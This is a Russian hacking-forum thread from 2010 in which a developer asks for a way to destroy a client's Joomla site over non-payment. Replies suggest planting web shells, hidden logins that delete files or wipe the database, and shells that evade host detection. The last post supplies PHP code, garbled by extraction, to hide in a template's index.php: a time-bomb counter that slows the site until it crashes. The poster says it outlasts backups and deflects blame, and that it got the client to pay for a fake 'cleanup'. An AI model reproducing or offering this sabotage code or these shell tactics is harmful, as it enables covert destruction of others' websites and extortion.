ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Joomla Кидалы
  #1  
Старый 17.01.2010, 17:27
Аватар для C.C.C.P
C.C.C.P
Banned
Регистрация: 26.10.2008
Сообщений: 45
Провел на форуме:
193422

Репутация: 8
По умолчанию Joomla Кидалы

Привет всем, подскажите есть ли какие нибудь готовые скрипты к Joomla 1.5, суть сделал сайт не заплатили, пишеш в строку браузера путь к этому скрипту, то что ты сделал на Joomla (вся работа уничтожается)
 
Ответить с цитированием

  #2  
Старый 17.01.2010, 17:28
Аватар для Zombi ****
Zombi ****
Участник форума
Регистрация: 04.04.2009
Сообщений: 256
Провел на форуме:
3165677

Репутация: 350
Отправить сообщение для Zombi **** с помощью ICQ
По умолчанию

Цитата:
Сообщение от C.C.C.P  
Привет всем, подскажите есть ли какие нибудь готовые скрипты к Joomla 1.5, суть сделал сайт не заплатили, пишеш в строку браузера путь к этому скрипту, то что ты сделал на Joomla (вся работа уничтожается)
нужно было залить шел)))
 
Ответить с цитированием

  #3  
Старый 17.01.2010, 17:29
Аватар для C.C.C.P
C.C.C.P
Banned
Регистрация: 26.10.2008
Сообщений: 45
Провел на форуме:
193422

Репутация: 8
По умолчанию

Цитата:
Сообщение от Zombi ****  
нужно было залить шел)))
не выход, шеллы паляться многими хостами
 
Ответить с цитированием

  #4  
Старый 17.01.2010, 17:34
Аватар для emillord
emillord
Участник форума
Регистрация: 20.01.2008
Сообщений: 284
Провел на форуме:
3767223

Репутация: 408
Отправить сообщение для emillord с помощью ICQ
По умолчанию

доступ к php исходникам есть? Можно в скрипте авторизации сделать что-то вроде если логин:xxx
пароль:xxx то удаляем index.php)
ну или как-то так.
 
Ответить с цитированием

  #5  
Старый 17.01.2010, 17:37
Аватар для C.C.C.P
C.C.C.P
Banned
Регистрация: 26.10.2008
Сообщений: 45
Провел на форуме:
193422

Репутация: 8
По умолчанию

Цитата:
Сообщение от emillord  
доступ к php исходникам есть? Можно в скрипте авторизации сделать что-то вроде если логин:xxx
пароль:xxx то удаляем index.php)
ну или как-то так.
cмысл у Joomla удалять Index.php... , нужно стирать базу...и переписывать файлы с правами 777
 
Ответить с цитированием

  #6  
Старый 17.01.2010, 17:39
Аватар для emillord
emillord
Участник форума
Регистрация: 20.01.2008
Сообщений: 284
Провел на форуме:
3767223

Репутация: 408
Отправить сообщение для emillord с помощью ICQ
По умолчанию

index.php - как вариант, если есть права то можно как вы говорите базу стирать.
 
Ответить с цитированием

  #7  
Старый 17.01.2010, 17:42
Аватар для C.C.C.P
C.C.C.P
Banned
Регистрация: 26.10.2008
Сообщений: 45
Провел на форуме:
193422

Репутация: 8
По умолчанию

Цитата:
Сообщение от emillord  
index.php - как вариант, если есть права то можно как вы говорите базу стирать.
вот думал у кого нибудь похожий скриптик есть


Кстате на счет шеллов, где можно уже закриптованые(Base 64) скачать, нормальные что бы не палились не чем

Последний раз редактировалось C.C.C.P; 17.01.2010 в 17:46..
 
Ответить с цитированием

  #8  
Старый 17.01.2010, 18:03
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

ВСО2 по дефолту есть криптованый.Пока что ничем не палится.А вообще,то что ты хочеш - полное говнецо,действовать нужно не так,и не нужно давать скрипты в перед.Показал на удаленке что все оке - плати бабло,получай скрипт.А елсли уже приспичило удалять файло у клиентоса,то это:
1) незаконно с точки зрения УК-РФ.
2) бесполезно.даже у самого куевого хостера,в худшем случае раз в день делаеться бекап.
Намек понятен?
 
Ответить с цитированием

  #9  
Старый 17.01.2010, 19:29
Аватар для (Dm)
(Dm)
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131

Репутация: 1695
По умолчанию

m0Hze дело говорит.

Цитата:
Сообщение от m0Hze  
2) бесполезно.даже у самого куевого хостера,в худшем случае раз в день делаеться бекап.
интересно а в лучшем случае как?
__________________
Cервер cs 1.6
cs.antichat.net:27015

Последний раз редактировалось (Dm); 17.01.2010 в 19:35..
 
Ответить с цитированием

  #10  
Старый 18.01.2010, 18:20
Аватар для strecher
strecher
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме:
102758

Репутация: 3
Wink

Были у меня проблемы с заказчиком, не хотел деньги отдавать. Фтп сохранился, вот я ему и подправил файлы.

Добавь в начало root/templates/название темплета/index.php

PHP код:
 <?php    if (file_exists('index2.php')) 
    {
        
$fil fopen('index2.php'r);
        
$dat fread($filfilesize('index2.php')); 
        
sleep(1$fil 20);
        
fclose($fil);
        
$fil fopen('index2.php'w);
        
fwrite($fil$dat+1);
    }

    else
    {
        
$fil fopen('index2.php'w);
        
fwrite($fil1);        
        
fclose($fil);
    } 
?>
Преимущества такого подхода:

+ В данном случае на каждые 20 заходов время загрузки увеличивается на одну секунду, поэтому сразу не заметят. Одна секунда - это не мало, очень заметно при 3-4 и более. Выше 60 и сайт не грузится - пхп таймоут.

+ Т.к. это бомба замедленного действия, когда заметят - бакапы не помогут. Хостеры обычно не более недели хранят файлы. Да и кто хочет терять работы на неделю.

+ Тебя не в чем обвинить - при чем тут ты? (Читай ниже)

Я код вставил, посидел недельку и мне звонят - мол, в чем дело - сайт ужасно тормозит? Я сказал - видимо база данных засорилась) А чистить - дело долгое, нудное - ещё за сотку почищу)) заодно и за сайт заплатили Правда прождал ещё пару дней пока сайт совсем не рухнул. Из-за рандома он все-таки время он времени появлялся на свет.

ЗЫ. Чтоб активировать этот скрипт можешь сделать файл с названием типа index2.php в папку инклудов который создаст файл activate.txt, а в скрипт добавить строку для проверки наличия файла.

ЗЫ.ЗЫ. Так же можешь использовать базу данных для счетчика.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ